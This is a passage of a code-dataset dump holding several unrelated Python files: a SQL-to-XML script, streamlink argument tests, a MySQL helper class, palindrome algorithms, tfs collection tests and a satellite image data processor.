[_GSourceFuncs,gpointer]\n \n return libgobject.g_source_remove_by_funcs_user_data(funcs, user_data, )\n\n","sub_path":"pyggi/gobject__GSource.py","file_name":"gobject__GSource.py","file_ext":"py","file_size_in_byte":16547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"408240660","text":"import pyodbc \r\nimport xml.etree.ElementTree as ET\r\nimport re\r\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\r\n \"Server=.;\"\r\n \"Database=qsrxGIGI;\"\r\n \"Trusted_Connection=yes;\")\r\n\r\n\r\ncursor = cnxn.cursor()\r\ncursor.execute('SELECT StoreCd FROM vxstore where StoreId <5')\r\n\r\nRoot = ET.Element(\"Data\")\r\nfor row in cursor: \r\n data = str(row)\r\n data = re.sub('[('',)]', '', data)\r\n ET.SubElement(Root, \"Row\",stcode = data)\r\ntree = ET.ElementTree(Root)\r\ntree.write(\"nik.xml\")","sub_path":"python1.py","file_name":"python1.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610094137","text":"import unittest\nfrom argparse import ArgumentTypeError\n\nfrom streamlink.utils.args import (\n boolean, comma_list, comma_list_filter, filesize, keyvalue, num\n)\n\n\nclass TestUtilsArgs(unittest.TestCase):\n\n def test_boolean_true(self):\n self.assertEqual(boolean('1'), True)\n self.assertEqual(boolean('on'), True)\n self.assertEqual(boolean('true'), True)\n self.assertEqual(boolean('yes'), True)\n self.assertEqual(boolean('Yes'), True)\n\n def test_boolean_false(self):\n self.assertEqual(boolean('0'), False)\n self.assertEqual(boolean('false'), False)\n self.assertEqual(boolean('no'), False)\n self.assertEqual(boolean('No'), False)\n self.assertEqual(boolean('off'), False)\n\n def test_boolean_error(self):\n with self.assertRaises(ArgumentTypeError):\n boolean('yesno')\n\n with self.assertRaises(ArgumentTypeError):\n boolean('FOO')\n\n with self.assertRaises(ArgumentTypeError):\n boolean('2')\n\n def test_comma_list(self):\n # (values, result)\n test_data = [\n ('foo.bar,example.com', ['foo.bar', 'example.com']),\n ('/var/run/foo,/var/run/bar', ['/var/run/foo', '/var/run/bar']),\n ('foo bar,24', ['foo bar', '24']),\n ('hls', ['hls']),\n ]\n\n for _v, _r in test_data:\n self.assertEqual(comma_list(_v), _r)\n\n def test_comma_list_filter(self):\n # (acceptable, values, result)\n test_data = [\n (['foo', 'bar', 'com'], 'foo,bar,example.com', ['foo', 'bar']),\n (['/var/run/foo', 'FO'], '/var/run/foo,/var/run/bar',\n ['/var/run/foo']),\n (['hls', 'hls5', 'dash'], 'hls,hls5', ['hls', 'hls5']),\n (['EU', 'RU'], 'DE,FR,RU,US', ['RU']),\n ]\n\n for _a, _v, _r in test_data:\n func = comma_list_filter(_a)\n self.assertEqual(func(_v), _r)\n\n def test_filesize(self):\n self.assertEqual(filesize('2000'), 2000)\n self.assertEqual(filesize('11KB'), 1024 * 11)\n self.assertEqual(filesize('12MB'), 1024 * 1024 * 12)\n self.assertEqual(filesize('1KB'), 1024)\n self.assertEqual(filesize('1MB'), 1024 * 1024)\n self.assertEqual(filesize('2KB'), 1024 * 2)\n\n def test_filesize_error(self):\n with self.assertRaises(ValueError):\n filesize('FOO')\n\n with self.assertRaises(ValueError):\n filesize('0.00000')\n\n def test_keyvalue(self):\n # (value, result)\n test_data = [\n ('X-Forwarded-For=127.0.0.1', ('X-Forwarded-For', '127.0.0.1')),\n ('Referer=https://foo.bar', ('Referer', 'https://foo.bar')),\n (\n 'User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:60.0)'\n ' Gecko/20100101 Firefox/60.0',\n ('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) '\n 'Gecko/20100101 Firefox/60.0')\n ),\n ('domain=example.com', ('domain', 'example.com')),\n ]\n\n for _v, _r in test_data:\n self.assertEqual(keyvalue(_v), _r)\n\n def test_keyvalue_error(self):\n with self.assertRaises(ValueError):\n keyvalue('127.0.0.1')\n\n def test_num(self):\n # (value, func, result)\n test_data = [\n ('33', num(int, 5, 120), 33),\n ('234', num(int, min=10), 234),\n ('50.222', num(float, 10, 120), 50.222),\n ]\n\n for _v, _f, _r in test_data:\n self.assertEqual(_f(_v), _r)\n\n def test_num_error(self):\n with self.assertRaises(ArgumentTypeError):\n func = num(int, 5, 10)\n func('3')\n\n with self.assertRaises(ArgumentTypeError):\n func = num(int, max=11)\n func('12')\n\n with self.assertRaises(ArgumentTypeError):\n func = num(int, min=15)\n func('8')\n\n with self.assertRaises(ArgumentTypeError):\n func = num(float, 10, 20)\n func('40.222')\n","sub_path":"tests/test_utils_args.py","file_name":"test_utils_args.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"530039900","text":"import pymysql.cursors\n\n\nclass Database:\n\n # Layout for table 'test_log'\n # id: 2^64 int, not null, auto increment\n # date_time: 24-char varchar, not null, format YYYY-MM-DD HH:MM:SS, when test was started\n # test_type: 16-char varchar, not null, what test type is used\n # delay: 2^32 int, nut null, delay in ms\n # extra: 32-char varchar\n\n def __init__(self, host, user, password, database, table, charset='utf8'):\n self.host = host\n self.user = user\n self.password = password\n self.database = database\n self.table = table\n self.charset = charset\n self.connection = None\n\n def open(self):\n self.test_closed_connection()\n\n # Open connection\n self.connection = pymysql.connect(\n host=self.host,\n user=self.user,\n password=self.password,\n db=self.database,\n charset=self.charset,\n cursorclass=pymysql.cursors.DictCursor)\n\n # Check if table exists, if not, create it.\n query = \"SELECT * FROM information_schema.tables WHERE table_schema = %s AND table_name = %s LIMIT 1;\"\n args = (self.database, self.table)\n result = self.execute_sql(query, args)\n if len(result) is 0:\n return self.create_table()\n else: # DEV\n self.drop_table()\n return self.create_table()\n\n def close(self):\n self.test_open_connection()\n self.connection.close()\n\n def drop_table(self):\n self.test_open_connection()\n query = \"DROP TABLE {};\".format(self.table)\n print(\"Dropping table ...\")\n return self.execute_sql(query)\n\n def create_table(self):\n self.test_open_connection()\n query = \"\"\"CREATE TABLE {} (\n id BIGINT UNSIGNED NOT NULL AUTO_INCREMENT,\n date_time VARCHAR(24) COLLATE utf8_bin NOT NULL,\n test_type VARCHAR(16) COLLATE utf8_bin NOT NULL,\n delay INT NOT NULL,\n extra VARCHAR(32) COLLATE utf8_bin,\n PRIMARY KEY(id)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;\"\"\".format(self.table)\n print(\"Table not found, creating new ...\")\n return self.execute_sql(query)\n\n def save_test(self, date_time, test_type, delay, extra=None):\n self.test_open_connection()\n query = \"INSERT INTO {} (date_time, test_type, delay, extra) VALUES (%s, %s, %s, %s);\".format(self.table)\n args = (date_time, test_type, delay, extra)\n return self.execute_sql(query, args)\n\n def get_last_test(self):\n self.test_open_connection()\n query = \"SELECT * FROM {0} WHERE ID = (SELECT MAX(ID) FROM {0});\".format(self.table)\n return self.execute_sql_fetch_one(query)\n\n def execute_sql(self, query, args=None):\n self.test_open_connection()\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n self.connection.commit()\n return cursor.fetchall()\n\n def execute_sql_fetch_one(self, query, args=None):\n self.test_open_connection()\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n self.connection.commit()\n return cursor.fetchone()\n\n def test_open_connection(self):\n if not self.connection:\n raise ValueError(\"Connection is closed.\")\n\n def test_closed_connection(self):\n if self.connection and self.connection.open():\n raise ValueError(\"Connection is already open.\")\n","sub_path":"database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34117800","text":"def longestPalindrome(s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n '''\n len_s = len(s)\n if len_s <= 1:\n return s\n m = {'center': 0, 'one_side': 0}\n for i in range(1, len_s):\n if i < len_s - 1 and s[i - 1] == s[i + 1]:\n left = i\n right = i\n if s[i] == s[i - 1]:\n left = i-1\n right = i\n temp = 1\n k = 1\n while left >=0 and right < len_s and s[left-k]==s[right-k]:\n temp += 2\n k += 1\n if m['one_side'] < temp:\n m['one_side'] = temp\n m['center'] = i\n print('ji数', m)\n return s[(m['center'] - m['one_side']):(m['center'] + m['one_side'] + 1)]\n '''\n #中心扩散法\n len_s = len(s)\n if len_s <= 1:\n return s\n # 至少是 1\n longest_palindrome = 1\n longest_palindrome_str = s[0]\n\n for i in range(len_s):\n palindrome_odd, odd_len = center_spread(s, len_s, i, i)\n palindrome_even, even_len = center_spread(s, len_s, i, i + 1)\n\n # 当前找到的最长回文子串\n cur_max_sub = palindrome_odd if odd_len >= even_len else palindrome_even\n if len(cur_max_sub) > longest_palindrome:\n longest_palindrome = len(cur_max_sub)\n longest_palindrome_str = cur_max_sub\n\n return longest_palindrome_str\n\ndef center_spread(s, size, left, right):\n \"\"\"\n left = right 的时候,此时回文中心是一条线,回文串的长度是奇数\n right = left + 1 的时候,此时回文中心是任意一个字符,回文串的长度是偶数\n \"\"\"\n l = left\n r = right\n while l >= 0 and r < size and s[l] == s[r]:\n l -= 1\n r += 1\n return s[l + 1:r], r - l - 1\n\ns = \"cbbd\"\n#print(longestPalindrome(s))\n\ndef longestPalindrome1(s):\n #动态规划\n len_s = len(s)\n if len_s <= 1:\n return s\n #定义状态函数\n dp = [[0]*len_s]*len_s\n #定义回文串长度,回文串切片\n longest_l = 1\n res = s[0]\n #\n for r in range(1,len_s):\n for c in range(r):\n if s[r] == s[c] and (dp[c+1][r-1] or r-c<=2):\n dp[c][r]=1\n cur_len = r-c+1\n if cur_len > longest_l:\n longest_l = cur_len\n res = s[c:r + 1]\n '''\n for item in dp:\n print(item)\n print('---')\n '''\n return res\n\nprint(longestPalindrome1(s))\n","sub_path":"005 最长回文子串.py","file_name":"005 最长回文子串.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"348995189","text":"import os\nimport pathlib\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom tfs import read_tfs\nfrom tfs.collection import Tfs, TfsCollection\nfrom tfs.frame import TfsDataFrame\n\nINPUT_DIR = pathlib.Path(__file__).parent / \"inputs\"\n\n\nclass CollectionTest(TfsCollection):\n file = Tfs(\"file_{}.tfs\")\n nofile = Tfs(\"nofile_{}.tfs\")\n filex = Tfs(\"file_x.tfs\", two_planes=False)\n value = 10\n\n def _get_filename(self, template, plane=\"\"):\n return template.format(plane)\n\n\nclass TestRead:\n\n def test_read_pathlib_input(self, _input_dir_pathlib: pathlib.Path, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert_frame_equal(_tfs_x, c.file_x)\n assert_frame_equal(_tfs_x, c.filex)\n # test that both capitalized and lowered plane keys are accepted\n assert_frame_equal(_tfs_x, c.file[\"x\"])\n assert_frame_equal(_tfs_x, c.file[\"X\"])\n assert_frame_equal(_tfs_y, c.file[\"y\"])\n assert_frame_equal(_tfs_y, c.file[\"Y\"])\n assert c.value == 10\n\n def test_read_str_input(self, _input_dir_str: str, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame):\n c = CollectionTest(_input_dir_str, allow_write=False)\n assert_frame_equal(_tfs_x, c.file_x)\n assert_frame_equal(_tfs_x, c.filex)\n # test that both capitalized and lowered plane keys are accepted\n assert_frame_equal(_tfs_x, c.file[\"x\"])\n assert_frame_equal(_tfs_x, c.file[\"X\"])\n assert_frame_equal(_tfs_y, c.file[\"y\"])\n assert_frame_equal(_tfs_y, c.file[\"Y\"])\n assert c.value == 10\n\n\nclass TestWrite:\n\n def test_write(self, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path)\n file_x_path = tmp_path / \"nofile_x.tfs\"\n assert not file_x_path.is_file()\n\n c.nofile_x = _tfs_y # only assigns dataframe without writing (use _tfs_y so that we can set _tfs_x below)\n assert not file_x_path.is_file()\n assert_frame_equal(_tfs_y, c.nofile_x)\n\n c.allow_write = True\n c.nofile_x = _tfs_x # should overwrite _tfs_y in buffer\n assert file_x_path.is_file()\n assert_frame_equal(_tfs_x, c.nofile_x)\n\n tfs_x_loaded = _read_tfs(file_x_path)\n assert_frame_equal(_tfs_x, tfs_x_loaded)\n\n c.nofile[\"y\"] = _tfs_y\n file_y_path = tmp_path / \"nofile_y.tfs\"\n assert file_y_path.is_file()\n assert_frame_equal(_tfs_y, c.nofile[\"y\"])\n assert_frame_equal(_tfs_y, c.nofile[\"Y\"])\n\n def test_write_tfs(self, _tfs_x: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path)\n name = \"nofile_x.tfs\"\n assert not (tmp_path / name).is_file()\n c.write_tfs(name, _tfs_x)\n assert (tmp_path / name).is_file()\n\n def test_write_to(self, _tfs_x: TfsDataFrame, tmp_path):\n class WriteToCollectionTest(TfsCollection):\n file = Tfs(\"file_{}.tfs\")\n filex = Tfs(\"file_x.tfs\", two_planes=False)\n\n def _get_filename(self, template, plane=\"\"):\n return template.format(plane)\n\n def _write_to(self, df, template, plane=\"\"):\n return f\"out_{self._get_filename(template, plane)}\", df\n\n c = WriteToCollectionTest(tmp_path, allow_write=True)\n filepath = tmp_path / \"out_file_x.tfs\"\n\n assert not filepath.exists()\n c.file_x = _tfs_x\n assert filepath.exists()\n\n filepath.unlink()\n\n assert not filepath.exists()\n c.filex = _tfs_x\n assert filepath.exists()\n\n def test_buffer_flush(self, _input_dir_str: str, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path, allow_write=True)\n\n c.file_x = _tfs_x.copy()\n c.nofile_y = _tfs_y.copy()\n tfs_x = _tfs_x.drop(columns=\"NAME\") # index reading below drops columns, TfsCollections does not\n tfs_y = _tfs_y.drop(columns=\"NAME\")\n\n c.file_x.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -199\n c.nofile_y.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -19\n\n assert_frame_equal(tfs_x, read_tfs(c.get_path(\"file_x\"), index=c.INDEX))\n assert_frame_equal(tfs_y, read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX))\n\n c.flush()\n\n tfs_x_after_flush = read_tfs(c.get_path(\"file_x\"), index=c.INDEX)\n tfs_y_after_flush = read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX)\n with pytest.raises(AssertionError):\n assert_frame_equal(tfs_x, tfs_x_after_flush )\n\n with pytest.raises(AssertionError):\n assert_frame_equal(tfs_y, tfs_y_after_flush)\n\n assert tfs_x_after_flush.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] == -199\n assert tfs_y_after_flush.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] == -19\n\n def test_buffer_flush_nowrite(self, _input_dir_str: str, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path, allow_write=True)\n\n c.file_x = _tfs_x.copy()\n c.nofile_y = _tfs_y.copy()\n tfs_x = _tfs_x.drop(columns=\"NAME\") # index reading below drops columns, TfsCollections does not\n tfs_y = _tfs_y.drop(columns=\"NAME\")\n\n c.file_x.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -199\n c.nofile_y.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -19\n\n assert_frame_equal(tfs_x, read_tfs(c.get_path(\"file_x\"), index=c.INDEX))\n assert_frame_equal(tfs_y, read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX))\n\n c.allow_write = False\n with pytest.raises(IOError):\n c.flush()\n\n tfs_x_after_flush = read_tfs(c.get_path(\"file_x\"), index=c.INDEX)\n tfs_y_after_flush = read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX)\n assert_frame_equal(tfs_x, tfs_x_after_flush)\n assert_frame_equal(tfs_y, tfs_y_after_flush)\n\n\nclass TestFilenames:\n\n def test_tfscollection_getfilename_not_implemented(self):\n with pytest.raises(NotImplementedError):\n TfsCollection._get_filename(\"doesnt matter\")\n\n def test_get_filename(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert c.get_filename(\"file_y\") == \"file_y.tfs\"\n assert c.get_filename(\"filex\") == \"file_x.tfs\"\n assert c.get_filename(\"nofile_x\") == \"nofile_x.tfs\"\n\n def test_get_filename_not_there(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n with pytest.raises(AttributeError):\n c.get_filename(\"doesn't matter either\")\n\n def test_filenames(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert c.filenames.file_y == \"file_y.tfs\"\n assert c.filenames.filex == \"file_x.tfs\"\n assert c.filenames.nofile_x == \"nofile_x.tfs\"\n\n assert c.filenames[\"file_x\"] == \"file_x.tfs\"\n assert c.filenames[\"nofile_y\"] == \"nofile_y.tfs\"\n\n exist_properties = \"file_x\", \"file_y\", \"filex\"\n not_exist_properties = \"nofile_x\", \"nofile_y\"\n exist_files = \"file_x.tfs\", \"file_y.tfs\"\n not_exist_files = \"nofile_x.tfs\", \"nofile_y.tfs\"\n\n assert c.filenames()[\"file_x\"] == \"file_x.tfs\"\n assert c.filenames()[\"nofile_y\"] == \"nofile_y.tfs\"\n\n assert all(f in c.filenames().keys() for f in exist_properties)\n assert all(f in c.filenames().keys() for f in not_exist_properties)\n assert all(f in c.filenames().values() for f in exist_files)\n assert all(f in c.filenames().values() for f in not_exist_files)\n\n assert all(f in c.filenames(exist=True).keys() for f in exist_properties)\n assert all(f not in c.filenames(exist=True).keys() for f in not_exist_properties)\n assert all(f in c.filenames(exist=True).values() for f in exist_files)\n assert all(f not in c.filenames(exist=True).values() for f in not_exist_files)\n\n def test_get_path(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert c.get_path(\"file_y\") == _input_dir_pathlib / \"file_y.tfs\"\n assert c.get_path(\"filex\") == _input_dir_pathlib / \"file_x.tfs\"\n assert c.get_path(\"nofile_x\") == _input_dir_pathlib / \"nofile_x.tfs\"\n\n\nclass TestOther:\n\n def test_access_methods(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n\n # Getting (partly tested in read-test as well)\n assert_frame_equal(c.file_x, c.file[\"x\"])\n assert_frame_equal(c.file_x, c.file[\"X\"])\n assert_frame_equal(c.file_x, c[\"file_x\"])\n\n # Setting\n c.nofile_y = c.file_y\n assert_frame_equal(c.nofile_y, c.file_y)\n\n c[\"nofile_y\"] = c.file_x\n assert_frame_equal(c.nofile_y, c.file_x)\n\n c.nofile[\"y\"] = c.file_y\n assert_frame_equal(c.nofile_y, c.file_y)\n\n c.nofile[\"Y\"] = c.file_x\n assert_frame_equal(c.nofile_y, c.file_x)\n\n def test_index(self, _input_dir_pathlib: pathlib.Path, _tfs_x: TfsDataFrame):\n c = CollectionTest(_input_dir_pathlib)\n c.INDEX = \"S\"\n assert all(c.filex.index == _tfs_x[\"S\"])\n\n def test_defined_properties(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib)\n exist_properties = {\"file_x\", \"file_y\", \"filex\", \"nofile_x\", \"nofile_y\"}\n assert set(c.defined_properties) == exist_properties\n\n def test_maybe(self, _input_dir_pathlib: pathlib.Path):\n def _test_fun(df, a, b):\n return df.BPMCOUNT, a + b\n\n c = CollectionTest(_input_dir_pathlib)\n res_no = c.maybe_call.nofile_x(_test_fun, 10, 20)\n assert res_no is None\n\n res_file = c.maybe_call.file_x(_test_fun, 10, 20)\n assert res_file[0] == 9\n assert res_file[1] == 30\n\n # same but with item:\n res_file = c.maybe_call.file[\"x\"](_test_fun, 5, 8)\n assert res_file[0] == 9\n assert res_file[1] == 13\n\n def test_buffer_clear(self, _dummy_collection):\n _dummy_collection._buffer[\"some_key\"] = 5\n assert _dummy_collection._buffer[\"some_key\"]\n _dummy_collection.clear()\n assert not _dummy_collection._buffer\n\n def test_no_attribute(self, _dummy_collection):\n with pytest.raises(AttributeError):\n _ = _dummy_collection.absent_attribute\n\n\ndef _read_tfs(path):\n \"\"\" Reads tfs like in _load_tfs() of the collection (here we know we have NAME in tfs). \"\"\"\n return read_tfs(path).set_index(\"NAME\", drop=False)\n\n\n@pytest.fixture()\ndef _tfs_x() -> TfsDataFrame:\n return _read_tfs(INPUT_DIR / \"file_x.tfs\")\n\n\n@pytest.fixture()\ndef _tfs_y() -> TfsDataFrame:\n return _read_tfs(INPUT_DIR / \"file_y.tfs\")\n\n\n@pytest.fixture()\ndef _input_dir_pathlib() -> pathlib.Path:\n return INPUT_DIR\n\n\n@pytest.fixture()\ndef _input_dir_str() -> str:\n return str(INPUT_DIR)\n\n\n@pytest.fixture()\ndef _dummy_collection() -> TfsCollection:\n return TfsCollection(\"\")\n","sub_path":"tests/test_collection.py","file_name":"test_collection.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225990459","text":"'''This module is designed to contain all the relevant methods needed to\r\n preprocess images for training, produce random or synthetic data to\r\n test a network and process other images so that the network can classify\r\n the image data.'''\r\n\r\nfrom satpy import Scene\r\nimport numpy as np\r\nfrom glob import glob\r\nfrom os.path import expanduser, join\r\nfrom PIL import Image\r\nfrom trollimage.xrimage import XRImage\r\nimport time as t\r\n\r\n\r\nclass DataProcessor(object):\r\n \"\"\"Data processor object. Takes the path to the data as stored locally and\r\n the datafile (folder of SLSTR data) to create a dataset from the given\r\n channels, called parameters. The dataset can be flattened and normalised\r\n for use with a neural network. The bayesian cloud mask is always used to\r\n produce training and test data, as it is the better of the two provided\r\n masks with SLSTR data.\r\n \"\"\"\r\n\r\n def __init__(self, datapath, datafile, input_channels,\r\n normalise=True, flatten=True,\r\n whiteness=False, temp_ratios=False,\r\n averages=False, angles=False):\r\n # Load the data set (not the values) from the data folder using the\r\n # path to the file\r\n self.load_dataset(datapath, datafile)\r\n # instantiate the parameters that need to be looked at\r\n self.flatten = flatten\r\n self.parameters = input_channels\r\n self.white = whiteness\r\n self.T_ratios = temp_ratios\r\n self.avg = averages\r\n self.channels = []\r\n self.geometry = []\r\n for parameter in self.parameters:\r\n if 'longitude' not in parameter and 'latitude' not in parameter:\r\n self.channels.append(parameter)\r\n else:\r\n self.geometry.append(parameter)\r\n # create the data object, containing all data we'll need to process\r\n self.data = {}\r\n # for each parameter, update the dictionary with the data\r\n for parameter in self.parameters:\r\n # keys are parameters, values are flattened arrays of values\r\n data = self.load_data(parameter)[1]\r\n if parameter in ['S1_an', 'S2_an', 'S3_an', 'S4_an', 'S5_an', 'S6_an']:\r\n data = self.regrid_500_to_1000(data)\r\n if flatten:\r\n self.data.update({parameter: data.flatten()})\r\n else:\r\n self.data.update({parameter: data})\r\n if angles:\r\n angles_array = self.create_angles_array()\r\n self.geometry.append('angles')\r\n if flatten:\r\n angles_array = angles_array.flatten()\r\n self.data.update({'angles': angles_array})\r\n # Format the Bayesian mask to a binary array for training, etc.\r\n og_mask = self.load_data('bayes_in')[1]\r\n bin_mask = self.binary_mask(og_mask)\r\n if flatten:\r\n bin_mask = bin_mask.flatten()\r\n self.cloud_mask = {'bayes_in': bin_mask}\r\n # this variable will contain hard-coded values of the values to\r\n # normalise each respective channel against and an offset to be added\r\n # to the original values in each channel.\r\n self.normalisation_values = {'S1_an': [100,0.],\r\n 'S2_an': [100,0.],\r\n 'S3_an': [100,0.],\r\n 'S4_an': [100,0.],\r\n 'S5_an': [100,0.],\r\n 'S6_an': [100,0.],\r\n 'S7_in': [150.,-200.],\r\n 'S8_in': [150.,-200.],\r\n 'S9_in': [150.,-200.]}\r\n if normalise:\r\n self.normalise_data()\r\n if self.white or self.T_ratios or self.avg:\r\n self.ancillary_information_addition(whiteness=self.white,\r\n ratio_temperatures=self.T_ratios,\r\n averages=self.avg)\r\n\r\n def load_dataset(self, datapath, datafile):\r\n \"\"\" This function uses an input datapath and datafile name to fetch the\r\n set of data\r\n\r\n :param datapath: str type. The path to the datafile\r\n :param datafile: str type. The name of the datafile\r\n :return: None\r\n \"\"\"\r\n # define the head using the path\r\n head = expanduser(datapath)\r\n # find out the filenames\r\n filenames = glob(join(head, datafile))\r\n # create a variable to hold the dataset\r\n self.global_scene = Scene(reader=\"nc_slstr\", filenames=filenames)\r\n # useful variable containing all possible data that can be fetched\r\n self.available_data = self.global_scene.available_dataset_names()\r\n\r\n def load_data(self, channel):\r\n \"\"\" Loads data from the dataset (self.global_scene) for a\r\n specific channel or parameter\r\n\r\n :param channel: str type. Should be a valid channel as given by\r\n self.available_data\r\n :return: tuple type. data is the data object, data.values is a np.array\r\n of data values\r\n \"\"\"\r\n # try statement just in case we can't actually load the data for some\r\n # reason\r\n try:\r\n self.global_scene.load([channel])\r\n data = self.global_scene.datasets[channel]\r\n # Catch KeyErrors to tell us that the data can't be loaded\r\n except KeyError:\r\n raise Exception('Cannot load data from: {}'.format(channel))\r\n return data, data.values\r\n\r\n def regrid_1000_to_500(self, array):\r\n \"\"\" Regrids a 1000m resolution image to a 500m resolution image by\r\n quadrupling the number of pixels such that one 500m pixel goes to\r\n 4 of the same.\r\n\r\n :param array: np.ndarray type. Array to be regridded\r\n :return: np.ndarray type. Regridded array\r\n \"\"\"\r\n # initial number of rows\r\n row_init = np.shape(array)[0]\r\n # final number of rows\r\n row_fin = 2 * row_init\r\n # initial number of columns\r\n col_init = np.shape(array)[1]\r\n # final number of columns\r\n col_fin = 2 * col_init\r\n # repeat the columns\r\n rep_entries = np.repeat(array, 2)\r\n # reshape the flattened output\r\n array2 = np.reshape(rep_entries, [row_init, col_fin])\r\n # repeat the rows\r\n rep_row = np.tile(array2, (1, 2))\r\n # reshape the rows\r\n regrided = np.reshape(rep_row, [row_fin, col_fin])\r\n return regrided\r\n\r\n def regrid_500_to_1000(self, array):\r\n '''Regrids a 500m resolution image to a 1000m resolution image by\r\n decreasing the number of pixels by a factor of 4 such that four\r\n 500m pixel go to 1 averaged value pixel of the same.\r\n\r\n :param a: np.ndarray type. Input array to be converted.\r\n :return: Converted array\r\n '''\r\n shape = (int(array.shape[0] / 2),\r\n array.shape[0] // int(array.shape[0] / 2),\r\n int(array.shape[1] / 2),\r\n array.shape[1] // int(array.shape[1] / 2))\r\n return array.reshape(shape).mean(-1).mean(1)\r\n\r\n def binary_mask(self, array):\r\n '''Formats input Bayesian mask array into a binary array.\r\n\r\n :param array: np.ndarray type. The Bayesian mask to be converted.\r\n :return: np.ndarray type. The binary mask\r\n '''\r\n non_zero = array != 0\r\n array[non_zero] = 1\r\n return array.astype(int)\r\n\r\n def scale_data(self, data, offset=0., factor=1.):\r\n \"\"\" For given input data, this function scales the data by a given\r\n factor\r\n\r\n :param data: numpy.ndarray type. The data to be scaled.\r\n :param offset: float type. Value which is to be added to the original value\r\n of the data.\r\n :param factor: float type. The factor by which to scale the data.\r\n :return: numpy.ndarray type. The scaled data.\r\n \"\"\"\r\n # make sure data is a np.ndarray\r\n if not isinstance(data, np.ndarray):\r\n raise Exception('Data must be in of the type numpy array')\r\n # scale the data\r\n scaled = (data + offset) * np.float32(factor)\r\n return scaled\r\n\r\n def normalise_data(self):\r\n \"\"\" Iterates through all data held by the data object and normalises\r\n them based on hard-coded normalisation factors given in the\r\n noramlisation_factor method\r\n\r\n :return: None\r\n \"\"\"\r\n # only want to iterate over our channels rather than cloud masks\r\n for channel in self.channels:\r\n # get the normalisation factor\r\n norm_factor = 1./ self.normalisation_values[channel][0]\r\n # get the offset value\r\n offset = self.normalisation_values[channel][-1]\r\n # scale the data\r\n norm_data = self.scale_data(self.data[channel], offset, norm_factor)\r\n # update our data\r\n self.data[channel] = norm_data\r\n\r\n def whiteness(self, data):\r\n if 'S1_an' not in self.parameters and 'S2_an' not in self.parameters:\r\n raise Exception('Need both S1_an and S2_an for whiteness')\r\n data1, data2 = data['S1_an'], data['S2_an']\r\n mean = data1 + data2 / 2.\r\n data1 -= mean\r\n data1 *= 1./mean\r\n data1 = np.absolute(data1)\r\n data2 -= mean\r\n data2 *= 1./mean\r\n data2 = np.absolute(data2)\r\n whiteness = data1 + data2\r\n return whiteness\r\n\r\n def avg_temp(self, data):\r\n if 'S8_in' not in self.parameters and 'S9_in' not in self.parameters:\r\n raise Exception('Need both S8_in and S9_in for average temperature')\r\n data1 = data['S8_in']\r\n data2 = data['S9_in']\r\n temp = data1 + data2\r\n avg_temp = temp/2.\r\n return avg_temp\r\n\r\n def temp_ratio(self, data):\r\n if 'S8_in' not in self.parameters and 'S9_in' not in self.parameters:\r\n raise Exception('Need both S8_in and S9_in for temperature ratio')\r\n ratio_dictionary = {}\r\n T = self.avg_temp(data)\r\n for channel in self.channels:\r\n ratio = data[channel]/T\r\n key = channel[:2] + '_temp_ratio'\r\n ratio_dictionary.update({key: ratio})\r\n return ratio_dictionary\r\n\r\n def create_angles_array(self):\r\n orbit_alt = 814.5\r\n counter = 0\r\n\r\n def processed_angle(distance):\r\n global counter\r\n angle = np.arctan(distance / orbit_alt) * (180. / np.pi)\r\n if np.isnan(angle):\r\n counter += 1\r\n return angle\r\n\r\n distances = []\r\n for i in range(749, -1, -1):\r\n distances.append(i)\r\n for i in range(750):\r\n distances.append(i)\r\n distances = np.array(distances)\r\n angles = []\r\n for distance in distances:\r\n angles.append(processed_angle(distance))\r\n array_of_angles = np.zeros((1200, 1500))\r\n for i in range(1500):\r\n 